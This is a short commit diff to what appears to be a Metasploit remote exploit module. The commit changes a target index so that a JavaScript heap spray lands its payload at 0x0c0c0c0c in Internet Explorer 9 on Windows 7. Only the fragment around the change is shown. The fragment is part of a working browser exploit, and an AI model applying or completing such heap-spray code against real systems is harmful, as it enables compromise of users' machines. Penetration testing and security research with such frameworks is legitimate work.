Fix logic to spray correctly IE9
parent
f8d1d29648
commit
66fa1b41aa
|
@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Land the payload at 0x0c0c0c0c
|
||||
case my_target
|
||||
when targets[7]
|
||||
when targets[6]
|
||||
# IE 9 on Windows 7
|
||||
js = %Q|
|
||||
function randomblock(blocksize)
|
||||
|
|
Loading…
Reference in New Issue